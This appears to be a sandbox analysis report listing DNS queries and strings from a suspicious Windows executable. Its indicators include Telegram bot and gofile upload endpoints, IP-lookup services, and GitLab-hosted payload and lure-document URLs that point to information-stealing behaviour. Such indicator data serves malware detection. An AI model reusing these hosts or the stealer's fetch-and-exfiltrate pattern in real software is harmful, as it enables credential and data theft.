      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC21A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='qMIslwQoDOPMBLtidScC4Q'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2 equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: gitlab.com
      Source: global trafficDNS traffic detected: DNS query: google.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
      Source: global trafficDNS traffic detected: DNS query: ip-api.com
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC050000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:443/
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gitlab.com:443/
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC154000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://google.com:443/
      Source: StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ip-api.com/json/
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC002000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC050000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/8.46.123.189P
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ip-api.com/json/y
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC050000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com:80/
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0A
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0X
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
      Source: StL9joVVcT.exe, 00000000.00000003.2144561862.000002357FF4C000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2147975398.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2380155005.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2146214184.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2145054548.000002357FF4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.op
      Source: StL9joVVcT.exe, 00000000.00000003.2144561862.000002357FF4C000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2147975398.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2380155005.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2146214184.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2145054548.000002357FF4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxml
      Source: StL9joVVcT.exe, 00000000.00000003.2144561862.000002357FF4C000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2443899460.000002357FF12000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2404886604.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2147975398.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2444915896.000002357FF17000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2380155005.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2402988198.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2450037293.000002357FF1A000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2146214184.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2145054548.000002357FF4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlf
      Source: StL9joVVcT.exe, 00000000.00000003.2144561862.000002357FF4C000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2443899460.000002357FF12000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2404886604.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2147975398.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2444915896.000002357FF17000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2380155005.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2402988198.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2450037293.000002357FF1A000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2146214184.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2145054548.000002357FF4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlform
      Source: StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Y
      Source: StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
      Source: StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name(DefaultRoleClaimTypexhttp://schemas.micro
      Source: StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/i
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB885000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC154000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.2
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB8B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC205000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC25D000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC21A000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC154000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2B4000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC194000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com:443/
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB8B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com/&ec=GAZA
      Source: StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
      Source: StL9joVVcT.exeString found in binary or memory: https://aka.ms/binaryformatter
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
      Source: StL9joVVcT.exeString found in binary or memory: https://aka.ms/dotnet-warnings/
      Source: StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
      Source: StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.gofile.io/servers
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.gofile.io/serversY
      Source: StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.org
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.orgY
      Source: StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/bot
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/boti
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC463000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC431000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC4C3000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC154000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
      Source: StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB885000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp3
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1FA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
      Source: StL9joVVcT.exeString found in binary or memory: https://github.com/dotnet/efcore
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/dotnet/linker/issues/2715.
      Source: StL9joVVcT.exeString found in binary or memory: https://github.com/dotnet/runtime
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/50820
      Source: StL9joVVcT.exeString found in binary or memory: https://github.com/ericsink/SQLitePCL.raw
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/ericsink/SQLitePCL.rawX
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/ericsink/SQLitePCL.rawd
      Source: StL9joVVcT.exeString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1187
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1416.
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1731
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1895vUsing
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1906.
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1981
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/2025
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/pull/2125.
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
      Source: StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
      Source: StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?in
      Source: StL9joVVcT.exe, 00000000.00000002.2451528416.00007FF7E2EC1000.00000004.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://google.com
      Source: StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB885000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC154000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/de
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
